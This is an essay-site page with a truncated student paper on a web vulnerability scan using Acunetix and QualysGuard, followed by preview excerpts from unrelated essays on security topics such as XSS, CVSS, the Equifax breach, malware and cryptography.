Methods (Acunetix and QualysGuard Freescan)
In addition to the Nmap analysis, we also conducted in-depth vulnerability assessments utilizing the commercially available Acunetix Web Vulnerability Scanner (Trial Edition) and the QualysGuard FreeScan web application tools to evaluate and detect potential weaknesses within the website: http://vlab02.pneumann.com/patients13/?bill_month=9. The Acunetix Web Vulnerability Scanner is an extremely robust security assessment tool commercially available through website downloads. The Acunetix tool’s key features include port scanner, HTTP sniffer, SQL injection tool, and a penetration tester capable of identifying a variety of potential website vulnerabilities including susceptibilities to buffer overflow and cross-site scripting (XXS) attacks (Acunetix, n.d.). Similar to the Acunetix web scanner, the QualysGuard Freecan tool is also a robust all-in one vulnerability assessment tool. The QualysGuard Freescan is cloud-based website vulnerability tool and port scanner capable of conducting over 5,000 vulnerability checks (Vacca, 2013). Both the Acunetix and the QualysGuard Freescan vulnerability assessment tools provide the user with a detailed report that identifies as well as prioritizes potential weaknesses and remedial actions within the target system or website.
Findings
The Acunetix web vulnerability scan revealed a total of 26 web alerts/potential vulnerabilities. Malicious attackers could possibly exploit these high-risk vulnerabilities to gain access to the sensitive information within the website’s database or damage/alter the website. The scan categorized three of the 26 potential vulnerabilities as severely high due to the website’s susceptibility to Structured Query Lang...
... middle of paper ...
...zed users to gain access to sensitive information. In order to ensure the security of private data and avoid unintended information leakage, utilizing hypertext transfer protocol over secure socket layer (HTTPS) provides encryption and a means of secure information. An authentication mechanism such as certificates would ensure that only authorized individuals with the proper credentials and proof of identify would be authorized to access sensitive data.
Works Cited
Goodrich, M. T. & Tomassia, R. (2011). Introduction to Computer Security. Boston,
Massachusetts: Pearson
Vacca, J.R. (2013). Computer and Information Security Handbook. Waltham, MA: Morgan
Kaufman
Wichers, D. & Manico, J. & Seil M. (2014, April 14) SQL Injection Prevention Cheat Sheet.
Retrieved from
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
A developer for Aim Higher College is creating a Web server form for submission of calendar events to the College’s event calendar. First let’s look into the type of the attacks the web server would be vulnerable to. The website server can fall into the wrong hands and face xss attacks where the attacker steals important information of the client and reduces the speed of the network and also sends large volume...
Created by Philip Zimmermann in 1991, this program has been widely used throughout the global computer community to protect the confidentiality and integrity of the users’ data, giving them the privacy of delivering messages and files only to their intended individual or authorized person (Singh, 2012). Not only being useful for individuals as a privacy-ensuring program, it has also been used in many corporations to protect their company’s data from falling into the wrong hands (Rouse, 2005).
CVSS, or Common Vulnerability Scoring System, provides a method for assessing and prioritizing previously unknown vulnerabilities in an application’s code that have been identified for IT management to address (Scarfone & Mell, 2007). CCSS, or Common Configuration Scoring System, is based off of using similar metrics to CVSS but is focused on known vulnerabilities based upon decisions regarding security configurations of the program.
Noam Arzt, identified various threats to patient privacy with the use of IIS. The threats to patient privacy were divided into three categories. These are Desktop threats, server threats, and network threats. Desktop threats are those threats that relate to desktop, whether it will be a terminal or personal computer. Server threats are threats that relate to Immunization Information Systems (IIS) server and its integrity. And lastly, network threats are threats that relate to the network that connects user desktops to IIS servers (Arzt,
1.) (3 points) The US Computer Emergency Readiness Team (US-CERT) publishes what are called Technical Cyber Security Alerts and Vulnerability Notes and these documents alert users to potential threats to the security of their systems. Select a Technical Security Alert or Vulnerability Note published in the last twelve months that has a network related component to it and research the reported problem and the suggested solution (if one is available.) Analyze and describe the problem, and the solution paying close attention to the network related issues that it raises. We are interested in reading your analysis, and not a cut-and-paste of what is on the website. The listing of recent Technical Security Alerts can be found at: http://www.us-cert.gov/cas/techalerts/ and the listing of Vulnerability Notes is at http://www.kb.cert.org/vuls
"Evolutions in Browser Security." NSS Labs. N.p., 28 Oct. 2013. Web. 19 Oct. 2014. <https://www.nsslabs.com/reports/evolutions-browser-security>.
Internet can give out a lot of advantages and new things to learn and experience, but it carries a risk of personal information leakage. Even a simple browsing history can show our most private interests. Hence, there are laws and legislation made to protect the confidential information. It acts as the barrier and protector against any unwanted outflow of information to computer criminals.
Apache Struts is a framework for developing Java-based applications that run both frontend and backend Web servers. Equifax uses this open-source web application to allow customers interaction. It was established that Apache Struts had a potential vulnerable plugin. Whenever a customer interacts with the system, this plug pulls information from a library program called XStream which converts data into a XML Java code. The hackers inserted their own meticulous codes into Java objects and manipulated the Equifax server running XStream (Bomey, Dastagir, Shell, par.
Risk assessment identifies an organizations potential risks and potential threats and by analyzing these threats countermeasures are prepared to respond and eliminate the hazard. In the article by Blanke & McGrady, (2016) the researcher is identifying a checklist of several known risks that most of us are comfortable with until the risks disrupt our services. Risks include any online device such as a portable laptops, tablets, printers, and smart devices, insiders, and physical breaches. In this case healthcare information is proprietary information that must be protected from cyber-attacks and require a robust cyber security risk management framework. The checklist identifies three known vulnerabilities and threats from known healthcare breaches. Risk assessment is analyzing the risk to develop security controls based on the type of risk the organization may encounter i.e. Malware, Ransomware, Spyware and Denial of Service techniques which are some of the most common types of cyber security attacks. Risk Assessment will ensure that all vulnerabilities and threats are assessed when conducting my research.
Penetration testing - using tools and processes to scan the network environment for vulnerabilities, [03& T, J.K et al. 2002] there are many different types of vulnerability assessments. Penetration Testing focuses on understanding the vulnerabilities of components that you’ve made available on the network as seen from the perspective of a skilful and determined attacker who has access to that network. It will provide a thorough overview of the ...
“In order to establish trust or confidence, there must be some binding of unique attributes in the website that will identify the unique identity. If website has got some elements of trust is commonly called authentication and will provide trust relationship to the users” (Andert et al 2002)
Nessus is an efficient, comprehensive vulnerability scanner that provides less false positives than many other tools currently available in th...
For thousands of years cryptography and encryption have been used to secure communication. Military communication has been the leader of the use of cryptography and the advancements. From the start of the internet there has been a greater need for the use of cryptography. The computer had been invented in the late 1960s but there was not a widespread market for the use of computers really until the late 1980s, where the World Wide Web was invented in 1989. This new method of communication has called for a large need for information security. The internet allows people to communicate sensitive information, and if received into the wrong hands can cause many problems for that person.
Malicious code is a real danger to modern systems. Most systems nowadays do not work in isolation; they are more likely to be connected to other systems and sometimes they can even be dependent on them. Therefore an attack on one of the systems in the network is a potential attacking attempt to any other systems, with which it is interacting. Therefore, it is inevitable for any networked or Internet-connected computers to deal with malicious code attacks at some point. Businesses lose billions of dollars each year because of malicious code attacks. Responding to the attack and restoring all the data on the computers is a time-consuming and expensive task. It is a much better practice to try preventing it through organizing and maintaining effective defenses. However, it is important to keep in mind that there is no one general solution that can help to prevent all the attacks. Attackers are constantly looking for new ways to take advantage of systems’ vulnerabilities and find new ones. That’s why organizations have to not only defend themselves against existing attack methods, but also try to predict and prevent new attacking techniques. It means that computer and network security is a never-ending challenge and expense.
In this era when the Internet provides essential communication between tens of millions of people and is being increasingly used as a tool for security becomes a tremendously important issue to deal with, So it is important to deal with it. There are many aspects to security and many applications, ranging from secure commerce and payments to private communications and protecting passwords. One essential aspect for secure communications is that of cryptography. But it is important to note that while cryptography is necessary for secure communications, it is not by itself sufficient. Cryptography is the science of writing in secret code and is an ancient art; In the old age people use to send encoded message which can be understand by the receiver only who know the symbolic and relative meaning of that encoded message .The first documented use of cryptography in writing dates back to circa 1900 B.C. Egyptian scribe used non-standard hieroglyphs in an inscription. After writing was invented cryptography appeared spontaneously with applications ranging from diplomatic missives to war-time battle plans. It is no surprise, then, that new forms of cryptography came soon after the widespread development of computer communications. In telecommunications and data cryptography is necessary when communicating in any untrusted medium, which includes any network, particularly the Internet [1].Within the context of any application-to-application communication, there are some security requirements, including: